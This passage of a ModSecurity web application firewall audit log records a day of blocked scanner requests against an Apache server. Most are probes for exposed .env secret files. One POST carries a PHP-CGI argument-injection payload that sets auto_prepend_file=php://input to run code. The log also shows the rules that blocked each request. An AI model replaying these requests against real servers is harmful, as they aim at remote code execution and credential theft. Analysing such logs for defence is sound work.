"CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265196218385 774 (- - -) Stopwatch2: 1745265196218385 774; combined=305, p1=269, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da0be70b-Z-- --65019676-A-- [22/Apr/2025:02:53:16 +0700] aAaiLHfk8_rbvOkGr1pkuwAAAIc 103.236.140.4 58748 103.236.140.4 8181 --65019676-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --65019676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65019676-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265196905164 868 (- - -) Stopwatch2: 1745265196905164 868; combined=436, p1=398, p2=0, p3=0, p4=0, p5=38, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65019676-Z-- --5437d05d-A-- [22/Apr/2025:02:53:17 +0700] aAaiLXfk8_rbvOkGr1pkwwAAAI8 103.236.140.4 58786 103.236.140.4 8181 --5437d05d-B-- GET /cgi-bin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --5437d05d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5437d05d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265197600837 743 (- - -) Stopwatch2: 1745265197600837 743; combined=322, p1=287, p2=0, p3=0, p4=0, p5=34, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5437d05d-Z-- --7502ca7b-A-- [22/Apr/2025:02:53:18 +0700] aAaiLqLIR8aniCwJv2WoVQAAAMo 103.236.140.4 58820 103.236.140.4 8181 --7502ca7b-B-- GET /content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --7502ca7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7502ca7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265198304403 775 (- - -) Stopwatch2: 1745265198304403 775; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7502ca7b-Z-- --4a79de63-A-- [22/Apr/2025:02:53:18 +0700] aAaiLqLIR8aniCwJv2WoWAAAAM0 103.236.140.4 58866 103.236.140.4 8181 --4a79de63-B-- GET /custom/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --4a79de63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a79de63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265198996102 648 (- - -) Stopwatch2: 1745265198996102 648; combined=239, p1=211, p2=0, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a79de63-Z-- --d205c757-A-- [22/Apr/2025:03:53:23 +0700] aAawQ19gRrTzIZGIAflDmgAAAJI 103.236.140.4 44722 103.236.140.4 8181 --d205c757-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.20.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.20.147 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d205c757-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d205c757-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745268803214051 922 (- - -) Stopwatch2: 1745268803214051 922; combined=401, p1=363, p2=0, p3=0, p4=0, p5=37, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d205c757-Z-- --80613c45-A-- [22/Apr/2025:05:45:57 +0700] aAbKpV9gRrTzIZGIAflNiQAAAIw 103.236.140.4 37066 103.236.140.4 8181 --80613c45-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.144.212.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.144.212.120 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --80613c45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80613c45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745275557531826 899 (- - -) Stopwatch2: 1745275557531826 899; combined=360, p1=321, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80613c45-Z-- --e2de2c4a-A-- [22/Apr/2025:05:46:33 +0700] aAbKya3OiIHZ_gUDzTtlgwAAAM0 103.236.140.4 38960 103.236.140.4 8181 --e2de2c4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36 Accept-Charset: utf-8 --e2de2c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2de2c4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745275593144333 699 (- - -) Stopwatch2: 1745275593144333 699; combined=301, p1=270, p2=0, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2de2c4a-Z-- --8c8c8e43-A-- [22/Apr/2025:06:08:48 +0700] aAbQAM0DNRaK3AYHswK10AAAAAw 103.236.140.4 53790 103.236.140.4 8181 --8c8c8e43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 8.1.0; zh-CN; EML-AL00 Build/HUAWEIEML-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 baidu.sogo.uc.UCBrowser/11.9.4.974 UWS/2.13.1.48 Mobile Safari/537.36 AliApp(DingTalk/4.5.11) com.alibaba.android.rimet/10487439 Channel/227200 language/zh-CN Accept-Charset: utf-8 --8c8c8e43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c8c8e43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745276928326370 900 (- - -) Stopwatch2: 1745276928326370 900; combined=392, p1=353, p2=0, p3=0, p4=0, p5=39, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c8c8e43-Z-- --fb845f6d-A-- [22/Apr/2025:08:05:57 +0700] aAbrdc0DNRaK3AYHswIYOAAAABY 103.236.140.4 36284 103.236.140.4 8181 --fb845f6d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --fb845f6d-C-- --fb845f6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb845f6d-E-- --fb845f6d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745283957746041 4796 (- - -) Stopwatch2: 1745283957746041 4796; combined=3638, p1=549, p2=3046, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb845f6d-Z-- --3be0f011-A-- [22/Apr/2025:08:20:48 +0700] aAbu8M0DNRaK3AYHswIl4wAAABU 103.236.140.4 33142 103.236.140.4 8181 --3be0f011-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; PIC-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3be0f011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be0f011-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745284848519930 788 (- - -) Stopwatch2: 1745284848519930 788; combined=370, p1=333, p2=0, p3=0, p4=0, p5=36, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be0f011-Z-- --e6a1b572-A-- [22/Apr/2025:09:12:16 +0700] aAb7AK3OiIHZ_gUDzTsatgAAAMw 103.236.140.4 37220 103.236.140.4 8181 --e6a1b572-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e6a1b572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6a1b572-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745287936593108 758 (- - -) Stopwatch2: 1745287936593108 758; combined=283, p1=249, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6a1b572-Z-- --2b3dc55d-A-- [22/Apr/2025:10:33:02 +0700] aAcN7q3OiIHZ_gUDzTtsOAAAAMQ 103.236.140.4 51048 103.236.140.4 8181 --2b3dc55d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept-Charset: utf-8 --2b3dc55d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b3dc55d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745292782247103 835 (- - -) Stopwatch2: 1745292782247103 835; combined=412, p1=377, p2=0, p3=0, p4=0, p5=34, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b3dc55d-Z-- --fcce8b15-A-- [22/Apr/2025:10:34:40 +0700] aAcOUF9gRrTzIZGIAfk3fQAAAJU 103.236.140.4 33340 103.236.140.4 8181 --fcce8b15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --fcce8b15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcce8b15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745292880269904 717 (- - -) Stopwatch2: 1745292880269904 717; combined=318, p1=289, p2=0, p3=0, p4=0, p5=29, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcce8b15-Z-- --27836a78-A-- [22/Apr/2025:11:40:56 +0700] aAcd2F9gRrTzIZGIAfmMXAAAAIU 103.236.140.4 56592 103.236.140.4 8181 --27836a78-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.20.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.20.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --27836a78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27836a78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745296856674774 870 (- - -) Stopwatch2: 1745296856674774 870; combined=383, p1=342, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27836a78-Z-- --cddab21a-A-- [22/Apr/2025:13:18:01 +0700] aAc0mc0DNRaK3AYHswKlOQAAAAs 103.236.140.4 43794 103.236.140.4 8181 --cddab21a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca) Accept-Charset: utf-8 --cddab21a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cddab21a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745302681660552 737 (- - -) Stopwatch2: 1745302681660552 737; combined=282, p1=249, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cddab21a-Z-- --8e5bb77f-A-- [22/Apr/2025:14:27:06 +0700] aAdEyq3OiIHZ_gUDzTub3AAAAMs 103.236.140.4 56560 103.236.140.4 8181 --8e5bb77f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 95.214.54.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 95.214.54.165 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --8e5bb77f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e5bb77f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745306826060135 1100 (- - -) Stopwatch2: 1745306826060135 1100; combined=551, p1=505, p2=0, p3=0, p4=0, p5=45, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e5bb77f-Z-- --a4125001-A-- [22/Apr/2025:14:46:22 +0700] aAdJTi3NG0xEq1F63-KQHQAAAE0 103.236.140.4 47392 103.236.140.4 8181 --a4125001-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a4125001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4125001-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745307982664363 958 (- - -) Stopwatch2: 1745307982664363 958; combined=324, p1=291, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4125001-Z-- --25d0b070-A-- [22/Apr/2025:15:14:10 +0700] aAdP0V9gRrTzIZGIAfm5hQAAAIU 103.236.140.4 45940 103.236.140.4 8181 --25d0b070-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.69.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.69.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --25d0b070-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25d0b070-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745309649999656 779 (- - -) Stopwatch2: 1745309649999656 779; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25d0b070-Z-- --daa19906-A-- [22/Apr/2025:16:00:33 +0700] aAdasa3OiIHZ_gUDzTsfvgAAANU 103.236.140.4 60834 103.236.140.4 8181 --daa19906-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.223.132.86 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --daa19906-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa19906-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745312433097234 611 (- - -) Stopwatch2: 1745312433097234 611; combined=261, p1=231, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
